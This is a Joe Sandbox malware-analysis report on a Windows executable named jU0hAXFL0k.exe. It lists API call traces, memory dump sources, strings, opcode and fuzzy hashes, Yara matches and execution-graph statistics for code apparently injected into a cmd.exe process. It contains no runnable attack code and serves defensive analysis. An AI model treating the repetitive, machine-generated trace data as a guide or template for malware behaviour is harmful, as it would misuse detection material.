• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(?,76403410,00000000,C:\Users\user\AppData\Local\Temp\,0040373A,00403554,?,?,00000006,?,0000000A), ref: 0040377C
• GlobalFree.KERNEL32(0057C310), ref: 00403783
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403762
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-787714339
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jU0hAXFL0k.exe,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 004059BF
                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jU0hAXFL0k.exe,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 004059CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharPrevlstrlen
                                                                                        • String ID: C:\Users\user\Desktop
                                                                                        • API String ID: 2709904686-3443045126
                                                                                        • Opcode ID: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                                                        • Instruction ID: a086819795abd80aa1ad59fb022c9920fa60cb9da26d6d2253466900a8022463
                                                                                        • Opcode Fuzzy Hash: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                                                        • Instruction Fuzzy Hash: 3FD0A7E3408DB05EE70353149C04B9F6A48CF12310F0900A3F180A21A6C67C1C414BFE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID:
                                                                                        • API String ID: 1780285237-0
                                                                                        • Opcode ID: b0ca44df10b43e5981dbca2bec097cf20f7a80a403f3a75379760c44d22770bb
                                                                                        • Instruction ID: 2e39068b96cff65f5dc7ec605e194ceaa9e433279b74551a1051b5c21cbaf247
                                                                                        • Opcode Fuzzy Hash: b0ca44df10b43e5981dbca2bec097cf20f7a80a403f3a75379760c44d22770bb
                                                                                        • Instruction Fuzzy Hash: 5531E4B1404600AFDB009FE9D944A6A7FFEFB07268B24411BE865C3250D739D821CB31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B00
                                                                                        • CharNextA.USER32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                                                        • Instruction ID: 2cbfd0870324320007afb9b70b5ca04d8eb3af27e3ea935175830c0dc6d3898b
                                                                                        • Opcode Fuzzy Hash: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                                                        • Instruction Fuzzy Hash: 50F0C231604414BFC702DBA9DC40D9EBBB8EF46250B2540A6E800F7251D274FE01ABA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                         Execution Coverage: 1.5%
                                                                                         Dynamic/Decrypted Code Coverage: 0%
                                                                                         Signature Coverage: 3.8%
                                                                                         Total number of Nodes: 472
                                                                                         Total number of Limit Nodes: 66
                                                                                         execution_graph (rendered call graph; raw node and edge data omitted). Nodes lie in the 02DD0000 code region of process 15 (see the memory dump source below) and in the 03B22xxx range. API calls reached in the graph: LdrInitializeThunk, LdrLoadDll, NtCreateFile, NtReadFile, NtClose, RtlAllocateHeap, RtlFreeHeap, LookupPrivilegeValueW, CreateProcessInternalW, SetErrorMode, Sleep.

                                                                                         Control-flow Graph
                                                                                         • Basic block 401 (2dea360-2dea3b1): call 2deaf60, then NtCreateFile
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02DE4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DE4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DEA3AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction ID: c763c553fa8e3c45753cd92aeecf7c1adc68e5bca318964cc0f0890a960f70da
                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction Fuzzy Hash: E8F0BDB2200208ABCB08DF88DC84EEB77ADEF8C754F158248BA0D97240C630E8118BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(02DE4D72,5EB65239,FFFFFFFF,02DE4A31,?,?,02DE4D72,?,02DE4A31,FFFFFFFF,5EB65239,02DE4D72,?,00000000), ref: 02DEA455
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction ID: e13de1336ab060622a7a414e305ed18da9fc908d182f1a3b503396839284920c
                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction Fuzzy Hash: 36F0A4B2200208ABCB14DF89DC80EEB77ADEF8C754F158248BA1D97241D630E8118BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtClose.NTDLL(02DE4D50,?,?,02DE4D50,00000000,FFFFFFFF), ref: 02DEA4B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
                                                                                        • Instruction ID: 7ba548fc81958882840a07e15e7f0d17be48a1bc22b859dd3b9c23f4b79da17e
                                                                                        • Opcode Fuzzy Hash: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
                                                                                        • Instruction Fuzzy Hash: 81E0D8B26001187ED614EBE8DC45EABB76DEF80754F15405AF90D5B142C631B5108BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtClose.NTDLL(02DE4D50,?,?,02DE4D50,00000000,FFFFFFFF), ref: 02DEA4B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction ID: e6cef175d3a72370aa47bc41fe2d848f6c7fd767b34ff1b41002c7e5cf92744e
                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction Fuzzy Hash: 8ED01276200214ABD710EB98CC45E97775DEF44750F154455BA195B241C530F90086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: fe1fb21b874dde8ba390e02b32e6360245f99ce62e666ce1043a0d6f67d37a7b
                                                                                        • Instruction ID: cfc5f5bb08d5945381774a86876455a33ea497b919ac715300617f900fa4b1ee
                                                                                        • Opcode Fuzzy Hash: fe1fb21b874dde8ba390e02b32e6360245f99ce62e666ce1043a0d6f67d37a7b
                                                                                        • Instruction Fuzzy Hash: F490023260511802D500A15846147062005C7D1205F61C865B0418568DD7A5895575A3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5d58fe9054e801ddb2995cc0f0998d21ac931e707eef2aaa75c7b74eaeea62ee
                                                                                        • Instruction ID: 797e7823a96119a01f4648f40c2c3d98feb7553100d23878683bdaff7367fb36
                                                                                        • Opcode Fuzzy Hash: 5d58fe9054e801ddb2995cc0f0998d21ac931e707eef2aaa75c7b74eaeea62ee
                                                                                        • Instruction Fuzzy Hash: 6190023220109C02D510A158850474A1005C7D1305F55C865B4418658DD7A588957122
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4f6e08697278ce08fb716680c7e08259b2e1da720f4f5ed88bfb7f8b9e60e12a
                                                                                        • Instruction ID: 30318009e4a5552fb59fe464584b5cd5aa73c3c5ff0bc4c7422c0b861c3ebdb4
                                                                                        • Opcode Fuzzy Hash: 4f6e08697278ce08fb716680c7e08259b2e1da720f4f5ed88bfb7f8b9e60e12a
                                                                                        • Instruction Fuzzy Hash: 7590023220101C42D500A1584504B461005C7E1305F51C46AB0118654DD725C8557522
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f2fbed80490ca6755f0f514304d183c12c5f55831182a7873aec78eb221cf6dc
                                                                                        • Instruction ID: 58e83f6527b7cb9ecdd6f63fbc033f43e33b8f1e1a9529d39858b1f6be3214e8
                                                                                        • Opcode Fuzzy Hash: f2fbed80490ca6755f0f514304d183c12c5f55831182a7873aec78eb221cf6dc
                                                                                        • Instruction Fuzzy Hash: 5D90023220101802D500A59855086461005C7E1305F51D465B5018555ED77588957132
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ebe05ba4dc306ad97e43eff5e08789c6ad948c8bdf1fdfebd140989aa9a06ab5
                                                                                        • Instruction ID: 5d5f923b4f969c7fde11b1fa6310471ca402c251911881f6de09baae675c00b4
                                                                                        • Opcode Fuzzy Hash: ebe05ba4dc306ad97e43eff5e08789c6ad948c8bdf1fdfebd140989aa9a06ab5
                                                                                        • Instruction Fuzzy Hash: A9900262202014034505B1584514616500AC7E1205B51C475F1008590DD63588957126
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 33a8f5e86b3fadeae03bb0c671c37dded2c65bdc259e18c4803d8a13550e131e
                                                                                        • Instruction ID: 5f00a902361d79a7233b2abb461cb644300657a1ade6d6f8d3bfc0634884bdbd
                                                                                        • Opcode Fuzzy Hash: 33a8f5e86b3fadeae03bb0c671c37dded2c65bdc259e18c4803d8a13550e131e
                                                                                        • Instruction Fuzzy Hash: 98900437311014030505F55C07045071047C7D7355351C475F100D550CF731CC757133
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: abb25c92c9ba606d6c9ede3db4ca7ae750d02f5270e514b794cdc1053799740f
                                                                                        • Instruction ID: e9334cfbdb78100df455045fdd549e1305c5f0ba2dff74de2b43692f04b25fae
                                                                                        • Opcode Fuzzy Hash: abb25c92c9ba606d6c9ede3db4ca7ae750d02f5270e514b794cdc1053799740f
                                                                                        • Instruction Fuzzy Hash: 3990022221181442D600A5684D14B071005C7D1307F51C569B0148554CDA2588656522
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 48b3a2e2f9c8c569be4cd7332848895c048819043c2b58ed7bba2afc864eb149
                                                                                        • Instruction ID: 300c7430cb57de39e825d038d0c11d354df7f75d5081f3044e3affa974283aa5
                                                                                        • Opcode Fuzzy Hash: 48b3a2e2f9c8c569be4cd7332848895c048819043c2b58ed7bba2afc864eb149
                                                                                        • Instruction Fuzzy Hash: E590026234101842D500A1584514B061005C7E2305F51C469F1058554DD729CC567127
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 83985cff17d9cf342477ef4bfb2e4a6e573c6ca39c18b2c992a7588544c79805
                                                                                        • Instruction ID: f95c39a722cf2735fbdb67a8e58b55f1a1c5de21abd6f4f4c44f6ab497c0d454
                                                                                        • Opcode Fuzzy Hash: 83985cff17d9cf342477ef4bfb2e4a6e573c6ca39c18b2c992a7588544c79805
                                                                                        • Instruction Fuzzy Hash: 4990027220101802D540B15845047461005C7D1305F51C465B5058554ED7698DD97666
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: d9ab495103db200adda2dd8c742ef0d37d156c688ef5e488c4b068f4ff7ad5c1
                                                                                        • Instruction ID: d39e6e5132d116e50c1758d846be8a18be6f1b6243cd3d86deba41f9b56f6519
                                                                                        • Opcode Fuzzy Hash: d9ab495103db200adda2dd8c742ef0d37d156c688ef5e488c4b068f4ff7ad5c1
                                                                                        • Instruction Fuzzy Hash: F890023220101813D511A15846047071009C7D1245F91C866B0418558DE7668956B122
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02DE9128
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 02DE9128
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        Uniqueness

